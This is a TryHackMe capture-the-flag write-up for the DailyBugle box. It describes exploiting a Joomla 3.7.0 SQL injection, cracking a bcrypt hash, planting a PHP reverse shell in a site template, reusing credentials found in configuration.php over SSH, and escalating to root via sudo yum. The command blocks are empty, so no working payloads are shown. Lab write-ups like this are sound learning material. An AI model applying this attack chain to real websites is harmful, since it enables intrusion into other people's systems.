THM - DailyBugle without MetaSploit

Intro
This box looks promising, featuring a real life CMS, Joomla, and one that is quite often in the wild too! It is even a CMS I used several years ago, for one of my blog!
Let’s see right now, if we can get in!
Target
Recon
Quick recon according to logo and info :
- Linux ;
- Joomla CMS, SQLi ;
- Privesc via yum.
Enum
Usual nmap
scan :
|
|
|
|
Exploitation
Manually browsing to the website confirms a Joomla website. Let’s run joomscan
in order to gather more info. We are especially interested about the version. Since we are looking for a known SQL injection.
After a few seconds, it happens our target is running Joomla 3.7.0
:
According to exploit-db, which confirms the SQLi
, we can now run sqlmap
like shown below:
|
|
While having this info is cool, it looks tedious to get what I am looking for.
Doing a little more research for an easy win, I came across a Python script to exploit this vuln, and it directly returned juicy info :
Looking on internet, this hash appears to be bcrypt, so let’s try to crack it with hashcat:
|
|
After a little while, it worked :
Doing a little more internet research, I found that there is another vuln in Joomla that allows an admin user to get reverse shell…
Getting Initial Shell
According to the link above, I edited a php file from an existing theme, replacing it with a PHP reverse shell
(the one from Kali / Parrot, located in /usr/share/webshell
), saved it, and called the URL : http://$target_ip/templates/beez3/index.php
where beez3
is the theme’s name and index.php
the file I edited.
It got me my foothold :
We are www-data
user, (un)fortunately and need to privesc!
PrivEsc
In order to do so, I downloaded and ran linpeas.sh
on the target.
After a little while, it discovered interesting information such as jjameson
user, a password in Joomla’s configuration.php
, and other things… As always, I was looking for an easy win, and tried to connect via SSH with the credentials I found… and it worked!
I was now, in as jjameson
with a real shell, stable connection and easy way to come back in!
First command I issued was sudo -l
in order to see if I could do anything as root
. It turns out, I was allowed to run yum
, which was very promising.
A quick look at GTFObins confirmed another easy win was probably coming. I simply copied/pasted (but also analyzed it, to make sure I understood what it did; there is no learning if you blindly copy/paste) the bits of code, and got a root shell
:
Outro
I found this box quite “straightforward” and very fun : chaining multiple vulns, in order to get a shell, then user misconfiguration in order to pwn a specific user and finally become root
!
I am pretty sure, there are other ways to get root
on this box (maybe with kernel
, or sudo
directly), but for once, I wanted to go the “intended” way.